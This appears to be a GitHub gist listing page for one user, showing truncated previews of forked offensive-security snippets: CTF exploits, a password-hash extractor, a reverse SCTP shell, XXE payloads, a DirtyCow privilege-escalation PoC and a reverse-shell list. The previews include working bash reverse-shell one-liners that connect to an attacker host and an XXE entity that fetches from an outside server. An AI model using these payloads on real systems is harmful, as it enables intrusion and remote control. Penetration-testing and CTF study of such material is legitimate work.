waywardsun
waywardsun
/ keepass2john.py
Created
December 21, 2017 12:08
— forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/) | |
| # ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012 | |
| # ./keepass2john.c was released under the GNU General Public License | |
| # source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c | |
| # | |
| # Python port by @harmj0y, GNU General Public License | |
| # |
waywardsun
/ 1.md
Created
November 9, 2017 05:58
— forked from sailik1991/0.0 CaptureTheFlag-CheetSheet.md
Quick reference for CTF
waywardsun
/ reverse_sctp_shell.c
Created
August 11, 2017 02:18
— forked from 0xabe-io/reverse_sctp_shell.c
Simple C code to create a reverse shell over SCTP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // server: ncat -v --sctp -l PORT_NUM | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <netinet/in.h> | |
| #include <netinet/sctp.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <arpa/inet.h> | |
| #include <string.h> |
waywardsun
/ pwn.py
Created
June 19, 2017 13:30
— forked from saelo/pwn.py
Solution for "assignment" of GoogleCTF 2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # Exploit for "assignment" of GoogleCTF 2017 | |
| # | |
| # CTF-quality exploit... | |
| # | |
| # Slightly simplified and shortened explanation: | |
| # | |
| # The bug is a UAF of one or both values during add_assign() if a GC is | |
| # triggered during allocate_value(). The exploit first abuses this two leak a |
waywardsun
/ XXE_payloads
Created
June 17, 2017 15:06
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
waywardsun
/ toilet-exploit.py
Created
June 1, 2017 21:33
— forked from m1ghtym0/toilet-exploit.py
POC exploit for toilet service of FAUST-CTF-2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| from re import findall | |
| from random import choice, randint | |
| from string import digits, ascii_uppercase | |
| from hashlib import sha256 | |
| from sys import argv, exit | |
| MAX_NAME_LEN = 64 |
waywardsun
/ offsec.md
Created
May 17, 2017 19:09
— forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow
Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
- Reconnaissance
- Passive/Semi-Passive
- Tools
- Passive/Semi-Passive
- Discover - https://github.com/leebaird/discover
waywardsun
/ gist:84496cb1e4eeab23e421a6a0af60a3fa
Created
December 19, 2016 20:17
— forked from galvanic/gist:861138ed2bdf61be3ce7
pyladies scapy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| my slides: | |
| https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb | |
| official docs: | |
| http://www.secdev.org/projects/scapy/demo.html | |
| http://www.secdev.org/projects/scapy/doc/usage.html#sniffing | |
| some tutorials from the internet: | |
| https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf | |
| https://samsclass.info/124/proj11/proj17-scapy.html |
waywardsun
/ cowroot.c
Created
October 21, 2016 18:00
— forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * (un)comment correct payload first (x86 or x64)! | |
| * | |
| * $ gcc cowroot.c -o cowroot -pthread | |
| * $ ./cowroot | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * Size of binary: 57048 | |
| * Racing, this may take a while.. | |
| * /usr/bin/passwd overwritten |
waywardsun
/ reverse_shells
Created
September 20, 2016 22:46
— forked from sckalath/reverse_shells
Reverse shells
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #bash | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| #bash alt | |
| exec /bin/bash 0&0 2>&0 | |
| #bash alt 2 | |
| 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
| #bash alt 3 |
NewerOlder